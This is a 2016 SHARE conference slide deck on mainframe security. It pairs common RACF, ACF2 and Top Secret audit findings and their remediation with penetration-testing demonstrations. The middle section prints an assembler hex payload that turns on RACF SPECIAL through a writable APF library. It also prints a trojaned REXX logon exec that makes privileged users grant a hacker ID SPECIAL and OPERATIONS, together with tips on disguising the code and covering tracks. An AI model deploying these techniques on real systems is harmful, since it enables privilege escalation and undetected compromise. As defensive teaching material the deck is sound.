Download - 2016 share the three headed beast v4
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Kerberos or Cerberus? The Three Headed Monster of Mainframe Security,
Penetration Testing and Hacking
Brian Marshall, Mark Wilson & Chad Rikansrud
InsertCustomSessionQR ifDesired.
#19708
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Agenda
The Top Five (or even Six) Assessment Findings• Brian Marshall: [email protected]
How to exploit One or Two of them• Mark Wilson: [email protected]
The Other World• Chad Rikansrud: [email protected]
Questions
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Introduction – Brian Marshall● 20 years in Information Technology
● VP Research and Development for Vanguard Integrity Professionals
● Mainframe RACF specialist
● DOD DISA STIG specialist
● Father and Grandfather.
● Speaker at many events (ISACA, ISSA, SHARE, Vanguard)
● Short, but devilishly good looking.
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
TOP FIVETOP FIVE
TOP FIVE
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/ ©
Finding
Explanation
Risk
Recommended Best Practice and
Remediation
Started Task IDs are not Defined as PROTECTED in RACF, RESTRICT in ACF2, or in the STC Record in Top Secret.
User IDs associated with started tasks should be defined as such which will will exempt them from revocation due to inactivity or excessive invalid password attempts, as well as being used to sign on to an application.
The ESM will allow the user ID to be used for the started task even if it has become revoked, but some started tasks may either submit jobs to the internal reader that will fail or may issue a RACROUTE REQUEST=VERIFY macro for the user ID that will also fail.
Review all started task user IDs that are not protected. Determine if the user IDs are used for any other function that might require a password. Define the started task user IDs as “protected” for those tasks that do not require a password.
“Top Five” Assessment Finding #5
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Finding
Explanation
Risk
Recommended Best Practice and
Remediation
Critical data sets with ‘global access’ greater than READ
The UACC value in RACF for a dataset profile defines the default level of access to which any user whose user ID or a group to which it has been connected does not appear in the access list. The ALL record in Top Secret contains data sets that have a default level of access for all users. There is no equivalent in CA ACF2, everything must be explicitly allowed.
Data sets that are protected by a ‘global access’ greater than READ will allow most users with system access to modify critical data residing in these data sets. In addition, users may be able to delete any data set covered by the dataset profiles that have global access defined.
Review each of these profiles and determine whether the ‘global access’ is appropriate. For those profiles where access is excessive, you will have to determine who really needs access before changing the ‘global access’. To find out who is accessing these data sets, review SMF data to determine who is accessing the data sets with greater than READ access.
“Top Five” Assessment Finding #4
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Finding
Explanation
Risk
Recommended Best Practice and
Remediation
Sensitive Data Sets with ‘global access’ Greater than NONE
The UACC value in RACF for a dataset profile defines the default level of access to which any user whose user ID or a group to which it has been connected does not appear in the access list. The ALL record in Top Secret contains data sets that have a default level of access for all users. There is no equivalent in CA ACF2, everything must be explicitly allowed.
Data sets that are protected by ‘global access’ greater than NONE allow most users with system access to read or modify these data sets. In addition, users may be able to delete any data set covered by the dataset profiles that have global access defined.
Review each of these profiles and determine whether the ‘global access’ is appropriate. For those profiles where access is excessive, you will have to determine who really needs access before changing the ‘global access’. To find out who is accessing these data sets, review SMF data to determine who is accessing the data sets with the ‘global access’.
“Top Five” Assessment Finding #3
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Finding
Explanation
Risk
Remediation
Inappropriate Usage of z/OS UNIX Superuser Privilege, UID=0
User IDs with z/OS UNIX superuser authority, UID(0), have full access to all UNIX directories and files and full authority to administer z/OS UNIX.
Since the UNIX environment is the z/OS portal for critical applications such as file transfers, Web applications, and TCPIP connectivity to the network in general, the ability of these superusers to accidentally or maliciously affect these operations is a serious threat. No personal user IDs should be defined with an OMVS segment specifying UID(0).
The assignment of UID(0) authority should be minimized by managing superuser privileges by granting access to one or more of the ‘BPX.qualifier’ profiles in the FACILITY class and/or access to one or more profiles in the UNIXPRIV class.
“Top Five” Assessment Finding #2
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Finding
Explanation
Risk
Remediation
Excessive Number of User IDs with No Password Interval
User IDs with no password Interval are not required to change their passwords
Since passwords do not need to be changed periodically, people who knew a password for an ID could still access that ID even if they are no longer authorized users.
Review each of the personal user profiles to determine why they require no expiration. Their passwords should adhere to the company policy regarding password changes. If the user ID is being used for started tasks or surrogate, it should be reviewed and changed to the appropriate ESM privilege.
“Top Five” Assessment Finding #1
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Finding
Explanation
Risk
Remediation
Excessive Access to APF Libraries
Authorized Program Facility (APF) libraries are in integral part of the z/OS architecture to enable maintenance of the integrity of the z/OS operating system environment. Libraries designated as APF allow programs to execute with the authority of z/OS itself, so the ability to modify these libraries must be strictly controlled.
UPDATE or higher access to an APF library can allow an individual to create an authorized program which can bypass security controls and execute privileged instructions. UPDATE or higher access should be limited to senior systems support staff.
Review the protection of all APF libraries and remove or change inappropriate access list entries and ensure that all IUPDATE activity is logged to SMF.
©2015 Vanguard Integrity Professionals, Inc. All Rights Reserved. You have a limited license to view these materials for your organization’s internal purposes.
Any unauthorized reproduction, distribution, exhibition or use of these copyrighted materials is expressly prohibited.
“The Worst” Assessment Finding
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Top Ten Critical Assessment Findings in Mainframe Environments74% Excessive Number of User ID’s with no Password Interval SEVERE
60% Inappropriate Usage of z/OS UNIX Superuser Privilege, UID = 0 SEVERE
54% Sensitive Data Sets with ‘global access’ Greater than NONE SEVERE
54% Critical Data Sets with ‘global access’ Greater than READ HIGH
53% Started Task IDs are not Defined as ‘protected’ IDs HIGH
52% Improper Use or Lack of UNIXPRIV Profiles HIGH
44% Excessive Access to the SMF Data Sets HIGH
42% Excessive Access to APF Libraries SEVERE
42% Excessive Access to z/OS UNIX File System Data Sets HIGH
40% ESM Database(s) is not Adequately Protected SEVERE
10/14/15
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Time to handover to …...
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Introduction – Mark Wilson● Technical Director at RSM Partners● Been in IT for over 36 Years….● I lead the Technical team at RSM that amounts to just over 60
technicians….yes it’s a lot of fun!!...most of the time● IT Security in particular mainframes is my specialist subject
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Getting the language right● Penetration Testing
– Done by the good people out there to stop the bad folks getting in
– This is the bit I enjoy the most● Hacking
– The bad guys or gals…… its not necessarily a male dominated activity these days
– They are after our stuff….
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Getting the language right● Vulnerability Scanning
– Scanning the code delivered by IBM and ISV’s along with any code you may have developed yourself
– Test the code to see if it has any vulnerabilities that could be exploited by a knowledgably user
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Getting the language right● Auditing
– The process of checking that we are doing everything correctly
– These are the good guys and are here to help– Work with them not against them– Educate them, don’t shun them…we all had to start
somewhere– How many IT Auditors actually understand what we do?
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Poorly protected APF lib’s● Very simple exploit● It not uncommon to find hundreds of users having update access
to APF authorised libraries……● What's most alarming is that the client site(s) typically has 10 or
less system programmers● Having update authority to an APF authorised library means I can
write my own authorised code and run it undetected
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Poorly protected APF lib’s● May ways to find the list of APF Authorised libraries
– ISRDDN, IPLINFO REXX Exec, TASID, etcOr write your own● TSO ISRDDN
– APF– ONLY APF– MEM FRED
● TSO IPLINFO APF – If you have installed IPLINFO REXX
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Excessive Access to APF Libraries● Once you have found an APF library you can update…
● Then the following manual sometimes can help
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Just a Bit of Code… Honest A START
DC X'411000300A6B58F0021CBFFFF154A774000858F0022458FF006C58FF00C896'
DC X'80F02617FF07FE'
END A
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Now the good bit!● Assemble and linkedit the code shown with AC(1)
● Place in an APF library with any name you want (LURACF)
● Run the program as a two step batch job…
– The first to call this program (PGM=LURACF)– The second to issue any RACF command you want!
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Now the good bit!● Why/How does this work?
● Well that little bit of code flipped a flag in my ACEE to turn on the RACF SPECIAL flag for my instorage ACEE
● This can be modified so that it looks very innocent, e.g. part of a translate table, or it can be rewritten in a virus-type manner, making it more difficult to disassemble
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Lets do it!
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
CLIST/REXX Issues● We quite often see CLIST/REXX Libraries that are universally
updateable that are not at the bottom of the list of concatenated datasets for SYSPROC or SYSEXEC
● Simply find an exec that is lower down in the concatenation that is used by one of the privileged users (Sec Admin, Sysprog, etc)
● Copy an exec to the universally accessible dataset and add a bit of your own code
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
CLIST/REXX Issues● An Example● When doing a Pen test we determined that we had UPDATE
authority to a CLIST/REXX Library allocated and used each time we logged on to TSO…the dataset was called USER.CLIST
● Add to this the fact that
– All users via their Logon Proc call the same exec WBA001● A simple update to WBA001 to call a little piece of code….● And then just sit and wait….
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
CLIST/REXX Issues
Added this line here
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
CLIST/REXX IssuesThe contents of USER.CLIST(MYCMD)/* REXX */
/***************************************************/
/* Trap the responses so no messages issued to the */
/* user as they logon…. */
/***************************************************/
TEMP = OUTTRAP(LINE.)/* is this the user I want to exploit?? */
UID =sysvar(sysuid)/* If so get THEM to issue the command you want */
IF UID = CHAD or BRIAN then do address tso alu MY_HACKER_ID SPECIAL OPERATIONSEnd
Could use a prefix (SUBSTR) for a group of
users!
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
CLIST/REXX Issues● So why pick on CHAD or BRIAN?
– We determined from looking at the syslog and output on the Q that CHAD and BRIAN were RACF SYSTEM SPECIAL
● So the next time either of them logs onto the system any command entered into mycmd is run…game over….
● I can even cover my tracks my resetting the ISPF stats to show another userid having last changed WBA001 and MYCMD
● Imagine if I changed it to CHAD or BRIAN!!
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Time to handover to …...
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Introduction – Chad Rikansrud
• 20 Years in Information Technology• Networking Protocols / Forensics• Programming (Assembler, C, Python, others)• Security & Security Research (z/OS, x86_64)
– Contributor to open source projects:• Metasploit, r2 disassembly framework, scrypt
• Cryptography implementations / protocols• Capture the Flag builder (BSides DFW,MSP)• Speaker at DEF CON, Derbycon, MN SEC, Others
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
How the bad guys think● Let’s assume 3 types of attackers:
– No mainframe knowledge, but skilled at exploits / other OS’s
– Some mainframe knowledge, also skilled at other OS’s
– Mainframe knowledge + hacking skills
● Look at 3 possible attacks (based on the above)
– JAVA deserialization / poor configuration (works out of the box)
– Scrape credentials (Clear or Self-Signed Cert) – use to submit remote JCL
– SMP/E injection & Forgery
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Attack #1 - JAVA
Java• Gift that keeps giving • Combination of inherent vulnerabilities (Fixed with patching
SMP/E, etc) and poorly written code.• Deserialization attacks (Common Libraries / Bad code)• Java takes care of the Code Page issues (Good for you/Good for
them!)
Java Exploit Demo
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Attack #2 – JCL over FTP w/Stolen Creds
JCL over FTP• Fantastic way to remotely exploit system with given creds.• How to get creds (Sniff wire, MITM Self-Signed Cert).• How to submit reliable JCL over FTP (Metasploit)• What to submit? (Shells, pull password database, etc.)
JCL over FTP demo
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Attack #3 – SMP/E Forgery
SMP/E• Lots of controls around RACF authorization for SMP/E commands• What about the Files / Libraries?
• OMVS /smpnts directory?• z/OS SMPPTS libraries• Global / Target / Distribution zones
• Insert code to build Load Module / Replace an Exit / Backdoor ?
SMP/E Forgery Demo
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Summary - Attacks● Don’t presume that attacks built for ‘nix / Windows can’t be
repurposed
– Sometimes they work out of the box– Occasionally require a little retooling / build tools to make
easier– Some work in theory – but require in depth knowledge.– All can make your life miserable
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Summary - Attacks● Remediation
– Secure your SMP/E libraries (See Brian’s notes on insecure libraries)
– Lock down FTP configuration.– Strong Passwords + 2-factor authentication < - - - - - This
mitigates many issues.– Secure coding training / practice. (Esp. Java
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Questions
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Related Sessions Session # Session Title Date and Time Room Speaker(s)
19683 RACF Monitoring & Reporting2016-08-02, 12:30:00 L402 Robert S. Hansel
19639 RACF Update2016-08-03, 08:30:00 L401 Mark Nelson, Julie A. Bergh
19638 CA ACF2 & CA Top Secret Update - R16 is Finally Here!2016-08-03, 10:00:00 L401 Carla Flores
19612HiperSockets: Capabilities, z/OS Config, Comparison to OSA, RoCE and SMC-D, and Routing to Linux on z 2016-08-03, 11:15:00 A601 Linda Harrison
19646RACF IRRXUTIL, System REXX, and the IBM Health Checker for z/OS: A Perfect Combination!
2016-08-03, 13:45:00 L402 Mark Nelson, Julie A. Bergh
19782 Experiences with Two Factor Authentication (2FA) on z/OS2016-08-03, 15:15:00 A704 Gary Morgan, Steve Brinkley
19464 Encryption? Yeah, We Do That2016-08-04, 10:00:00 L505 Phil Smith III
19389 Can CICS Be Hacked? Are Yesterday's Practices Today's Exposure?2016-08-04, 10:00:00 A602 Leigh Compton
19655Preparing for a Security Audit? Introducing Key Tracking, Key Validity and Key Archival Using ICSF (Integrated Cryptographic Service Facility)
2016-08-04, 13:45:00 A601 Eysha Shirrine Powers
19241 z/OS Communications Server Security Using Policy Agent2016-08-04, 13:45:00 L401 Linda Harrison
19804 PAGENT & RACF: Security from within the Black Box and Beyond2016-08-04, 16:30:00 L508
Brian Marshall, Marlaina Chirdon
19239 Safe and Secure Transfers with z/OS FTP2016-08-04, 16:30:00 L402 Chris Meyer; Sam Reynolds
19424 A New Look at Mainframe Hacking and Penetration Testing2016-08-05, 08:30:00 L402 Mark Wilson
19765SHARE Live! - High Expectations: Our Systems Are (or Could Be) as Secure as Airplanes 2016-08-05, 11:15:00 A702 Mark Nelson
www.share.org/sanantonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Thank You for Attending!
Please remember to complete your evaluation in the SHARE mobile app.
#19708